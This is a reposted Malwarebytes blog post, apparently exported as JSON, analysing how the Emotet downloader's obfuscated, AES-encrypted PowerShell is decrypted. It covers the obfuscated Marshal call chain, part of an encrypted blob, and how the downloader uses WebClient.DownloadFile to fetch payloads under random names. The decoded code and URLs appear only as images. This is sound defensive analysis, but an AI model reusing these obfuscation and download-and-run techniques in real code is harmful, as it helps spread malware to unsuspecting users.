{"id":12508,"date":"2018-06-07T08:10:04","date_gmt":"2018-06-07T16:10:04","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2018\/06\/07\/news-6277\/"},"modified":"2018-06-07T08:10:04","modified_gmt":"2018-06-07T16:10:04","slug":"news-6277","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2018\/06\/07\/news-6277\/","title":{"rendered":"Malware analysis: decoding Emotet, part 2"},"content":{"rendered":"<p><strong>Credit to Author: Vishal Thakur| Date: Thu, 07 Jun 2018 15:00:00 +0000<\/strong><\/p>\n<p>In part two of our series on decoding Emotet, (you can catch up on <a href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/05\/malware-analysis-decoding-emotet-part-1\/\" target=\"_blank\" rel=\"noopener\">part 1 here<\/a>), we&#8217;ll cover analysis of the PowerShell code. Before we do that, however, it is a good idea to list some of the functions and calls that are used in the code for the execution.<\/p>\n<ul>\n<li>System.Runtime.InteropServices.Marshal: used for memory management<\/li>\n<li>SecureStringToBSTR: used to convert the secure string to decrypted data<\/li>\n<li>ConvertTo-SecureString: used to convert the encrypted data into secure string<\/li>\n<\/ul>\n<h3>Encryption and PowerShell<\/h3>\n<p>There are a couple of ways to encrypt data using PowerShell. DPAPI (Data Protection Application Programming Interface) is one method of encrypting with PowerShell, but it&#8217;s not what our malware uses. Emotet downloader malware uses AES to encrypt data. So let&#8217;s take a look at how AES works.<\/p>\n<p>If the data is encrypted using ConvertTo-SecureString but with NO key, PowerShell will by default use DPAPI. But it will only work for the logged in user on the machine it was encrypted on.<\/p>\n<p>If the data is encrypted using ConvertTo-SecureString with a key, PowerShell will use AES to encrypt the data and it can be decrypted on any machine, by anyone who has the encryption key. Emotet downloader uses AES for encrypting the code, with the key hardcoded in the malware itself.<\/p>\n<h3>Code execution flow<\/h3>\n<p>In order to get to the encrypted code, we need to first understand the flow of execution. Let\u2019s have a look at how the code is structured.<\/p>\n<h4>Code structure<\/h4>\n<p>[RuntIME.InteroPsERvICEs.marshAl]::([runtiME.IntErOpserViceS.marshal].GeTMEmbERS()[2].nAME).inVOKe([RUNtIme.intEropseRVICEs.MarShal]::SeCURestrINgtogLoBaLaLloCUnicOde(<\/p>\n<p>From the snippet above, we need to extract useful code and then re-construct the structure so that we can follow the execution-flow and decrypt the code.<\/p>\n<p>[System.Runtime.InteropServices.Marshal]::<br \/> PtrToStringAuto([System.Runtime.InteropServices.Marshal]::<br \/> SecureStringToGlobalAllocUnicode<\/p>\n<h4>Code analysis<\/h4>\n<p>Now that we have a usable code structure, we can move on to the next step.<\/p>\n<p>The code above is looking for an encrypted data string that can then be run through SecureString for decryption.<\/p>\n<p>We now have access to the encrypted data from the VBA.<\/p>\n<p>&#8216;76492d1116743f0423413b16050a5345MgB8ADYAYwB4AHAAdgAxAHEAdQAvAEkAVQBXADQANQBrAFUAWgBkAEIANwBTAGcAPQA9AHwAYgAyADUAOQAwADMAYgBkAGMAOAA1AGMANwA0ADgAZgBhADUAYQBhAGIAYgBkADcAMwA1ADgAYwA3ADIANwA1ADAAZAA4AGEAYQBiADEANwBkADIAMwA3ADMANABlAGUAOAAxADUAZQA3ADAAOAAxADMAZQAyADIAZQBlADUAOAAxADcAMQAxAGUAOAA4ADUAOQAzADcAMwBlADcAOABmADYAYwA5ADkANAA3ADMAMABhAGMAMwAzADIAMQAxADcAYwA2AGQAMgAxADAAZQAyADQAZgAyAGUAMQA\u2026&#8230;<\/p>\n<p>We will take that encrypted code and run it through ConvertTo-SecureString to start the decryption process.<\/p>\n<p>Since the data string is so long, it is a good idea to first save it as a file and then pass it to a variable in PowerShell.<\/p>\n<p>For the purpose of this analysis, we\u2019ll save it as encrypted_code.txt.<\/p>\n<p>Now, we\u2019ll pass it to a variable $vEncrypted:<\/p>\n<p><strong>$vEncrypted = [IO.File]::ReadAllText(&#8220;absolute_pathencrypted_code.txt&#8221;)<\/strong><\/p>\n<p>There are different ways to achieve the same result. Get-Content can also be used.<\/p>\n<p>Next, we run it through ConvertTo-SecureString to convert the encrypted string into a SecureString:<\/p>\n<p><strong>$vDecrypted = ConvertTo-SecureString -String $vEncrypted -k (key goes here)<\/strong><\/p>\n<p>NOTE: The malware authors would have previously used \u201cConvertFrom-SecureString\u201d with a key (now hard-coded into the malware code) to encrypt the data. We\u2019re simply reversing the process to extract the encrypted code.<\/p>\n<p>The last step is to now Marshal the SecureString through the SecureString to get the decrypted code.<\/p>\n<p>We\u2019ll store the result in a variable to keep it clean and simple.<\/p>\n<p><strong>$vResult = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($vDecrypted))<\/strong><\/p>\n<p>Note that we have used SecureStringToBSTR instead of what the malware authors are using (SecureStringToGlobalAllocUnicode). The reason for this is that BSTR converts SecureString string value to a binary string (BSTR) recognized by COM. SecureStringToGlobalAllocUnicode would work as well.<\/p>\n<p>That\u2019s it. $vResult should now have the completely decrypted code with the payload URLs.<\/p>\n<h3>Step-by-step analysis<\/h3>\n<p>Now that we know the code flow, let\u2019s run it in PowerShell and put all the knowledge we have gained by analyzing the code to work.<\/p>\n<p>First of all, we\u2019ll pass the encrypted code to the variable $vEncrypted:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"24078\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/attachment\/pic1-2\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic1.png\" data-orig-size=\"974,75\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"pic1\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic1-300x23.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic1-600x46.png\" class=\"aligncenter size-full wp-image-24078\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic1.png\" alt=\"\" width=\"974\" height=\"75\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic1.png 974w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic1-300x23.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic1-600x46.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic1-965x75.png 965w\" sizes=\"auto, (max-width: 974px) 100vw, 974px\" \/><\/p>\n<p>As you can see below, the encrypted data has now been stored in our variable vEncrypted:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"24079\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/attachment\/pic2-3\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic2.png\" data-orig-size=\"974,650\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"pic2\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic2-300x200.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic2-600x400.png\" class=\"aligncenter size-full wp-image-24079\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic2.png\" alt=\"\" width=\"974\" height=\"650\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic2.png 974w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic2-300x200.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic2-600x400.png 600w\" sizes=\"auto, (max-width: 974px) 100vw, 974px\" \/><\/p>\n<p>The next step now is to convert the encrypted data into SecureString by running it through ConvertTo-SecureString function. We will use the key that we found hard-coded into the malware code. We will pass the output to the variable vDecrypted:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"24080\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/attachment\/pic3-2\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic3.png\" data-orig-size=\"974,97\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"pic3\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic3-300x30.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic3-600x60.png\" class=\"aligncenter size-full wp-image-24080\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic3.png\" alt=\"\" width=\"974\" height=\"97\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic3.png 974w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic3-300x30.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic3-600x60.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic3-965x97.png 965w\" sizes=\"auto, (max-width: 974px) 100vw, 974px\" \/><\/p>\n<p>In the next step, we will confirm if the conversion was successful or not. As we can see below, the conversion was successful:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"24081\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/attachment\/pic4-2\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic4.png\" data-orig-size=\"974,116\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"pic4\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic4-300x36.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic4-600x71.png\" class=\"aligncenter size-full wp-image-24081\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic4.png\" alt=\"\" width=\"974\" height=\"116\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic4.png 974w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic4-300x36.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic4-600x71.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic4-965x116.png 965w\" sizes=\"auto, (max-width: 974px) 100vw, 974px\" \/><\/p>\n<p>Now, the final step to decrypt the data is to Marshal it through SecureStringToBSTR and pass the output to a variable, in this case, vResult:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"24082\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/attachment\/pic5-2\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic5.png\" data-orig-size=\"974,93\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"pic5\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic5-300x29.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic5-600x57.png\" class=\"aligncenter size-full wp-image-24082\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic5.png\" alt=\"\" width=\"974\" height=\"93\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic5.png 974w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic5-300x29.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic5-600x57.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic5-965x93.png 965w\" sizes=\"auto, (max-width: 974px) 100vw, 974px\" \/><\/p>\n<p>It\u2019s now time to print the output of the variable and look at the decrypted code!<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"24083\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/attachment\/pic6\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic6.png\" data-orig-size=\"974,106\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"pic6\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic6-300x33.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic6-600x65.png\" class=\"aligncenter size-full wp-image-24083\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic6.png\" alt=\"\" width=\"974\" height=\"106\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic6.png 974w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic6-300x33.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic6-600x65.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic6-965x106.png 965w\" sizes=\"auto, (max-width: 974px) 100vw, 974px\" \/><\/p>\n<p>We will further execute the code to extract the payload URLs and print them to console in a clean and nice way. As we can see in the code, variable $ADCX holds the URLs. We will use the split function as shown in the decrypted code and pass the output to $ADCX.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"24084\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/attachment\/pic7\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic7.png\" data-orig-size=\"974,91\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"pic7\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic7-300x28.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic7-600x56.png\" class=\"aligncenter size-full wp-image-24084\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic7.png\" alt=\"\" width=\"974\" height=\"91\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic7.png 974w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic7-300x28.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic7-600x56.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic7-965x91.png 965w\" sizes=\"auto, (max-width: 974px) 100vw, 974px\" \/><\/p>\n<p>All we have to do now is print the value of $ADCX to console and we get all the URLs in a list.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"24086\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/attachment\/pic8\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic8.png\" data-orig-size=\"974,175\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"pic8\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic8-300x54.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic8-600x108.png\" class=\"aligncenter size-full wp-image-24086\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic8.png\" alt=\"\" width=\"974\" height=\"175\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic8.png 974w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic8-300x54.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic8-600x108.png 600w\" sizes=\"auto, (max-width: 974px) 100vw, 974px\" \/><\/p>\n<p>We already have the network IOC. At this point, we can go home! But do we ever?<\/p>\n<h3>Reconstructing the command-line arguments<\/h3>\n<p>Let\u2019s reconstruct the full command-line arguments, mostly as a reward for completing the analysis!<\/p>\n<p>Here\u2019s our PowerShell code, structured and readable:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"24087\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/attachment\/pic9\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic9.png\" data-orig-size=\"974,364\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"pic9\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic9-300x112.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic9-600x224.png\" class=\"aligncenter size-full wp-image-24087\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic9.png\" alt=\"\" width=\"974\" height=\"364\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic9.png 974w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic9-300x112.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic9-600x224.png 600w\" sizes=\"auto, (max-width: 974px) 100vw, 974px\" \/><\/p>\n<p>And here\u2019s the same code, cleaned and beautified:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"24088\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/attachment\/pic10\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic10.png\" data-orig-size=\"974,364\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"pic10\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic10-300x112.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic10-600x224.png\" class=\"aligncenter size-full wp-image-24088\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic10.png\" alt=\"\" width=\"974\" height=\"364\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic10.png 974w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic10-300x112.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic10-600x224.png 600w\" sizes=\"auto, (max-width: 974px) 100vw, 974px\" \/><\/p>\n<p>Now, we will look at all the variables and analyze them one-by-one to reconstruct the complete command-line arguments.<\/p>\n<h4>$nsadasd<\/h4>\n<p>This variable is assigned the value as the output of (new-object) random, which translates to System.random.<\/p>\n<p>Later in the code, this variable will be used to generate a random value (between 10,000 and 282,133) to be used as the file name for the downloaded payload. We\u2019ll see that in action when we analyze $NSB.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"24089\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/attachment\/pic11\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic11.png\" data-orig-size=\"974,72\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"pic11\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic11-300x22.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic11-600x44.png\" class=\"aligncenter size-full wp-image-24089\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic11.png\" alt=\"\" width=\"974\" height=\"72\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic11.png 974w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic11-300x22.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic11-600x44.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic11-965x72.png 965w\" sizes=\"auto, (max-width: 974px) 100vw, 974px\" \/><\/p>\n<h4>$YYU<\/h4>\n<p>This variable is assigned the value \u201c(new-object) System.Net.WebClient,\u201d which will be used later with DownloadFile to download content from the Internet with the specified URI and save it as a local file. We can have a look at the value assigned to the variable in the image below. These are the attributes that will be used to start the download of the payload.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"24090\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/attachment\/pic12\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic12.png\" data-orig-size=\"729,285\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"pic12\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic12-300x117.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic12-600x235.png\" class=\"aligncenter size-full wp-image-24090\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic12.png\" alt=\"\" width=\"729\" height=\"285\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic12.png 729w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic12-300x117.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic12-600x235.png 600w\" sizes=\"auto, (max-width: 729px) 100vw, 729px\" \/><\/p>\n<h4>$NSB<\/h4>\n<p>As we saw earlier, this variable calls on the previously declared variable \u201cnsadasd\u201d in conjunction with \u201c.next\u201d, which turns the argument into the method \u201crandom.next.\u201d This, in turn, would return a random number within the specified range (in this case, 10,000 \u2013 282,133). As you can see below, it returns a different value each time it is executed.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"24091\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/attachment\/pic13\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic13.png\" data-orig-size=\"833,168\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"pic13\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic13-300x61.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic13-600x121.png\" class=\"aligncenter size-full wp-image-24091\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic13.png\" alt=\"\" width=\"833\" height=\"168\" 